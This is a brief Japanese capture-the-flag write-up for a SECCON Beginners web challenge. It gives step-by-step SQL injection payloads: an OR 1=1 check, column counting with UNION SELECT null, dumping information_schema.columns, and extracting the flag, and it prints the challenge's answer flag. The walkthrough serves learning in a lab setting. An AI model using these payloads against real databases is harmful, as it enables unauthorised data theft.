https://score.beginners.seccon.jp
解法
まずは、SQL injectionできるかの確認(最後にスペース必要)
' OR 1=1 --
次に、もともとのSQLのクエリでselectされているカラムの個数を見つける
' union select null, null --
nullを増やしていくと、2つでエラーが消えるので、カラムは2つのようだ。
次にDBの情報を抜き出そう。
' union select table_name, column_name from information_schema.columns --
とてもいっぱい出てくるが、flagテーブルにflagカラムのみというやつがあるので、
これを取ってくることにする。
' union select flag, null from flag --
これで「ctf4b{a_simple_sql_injection_with_union_select}」が出てくる。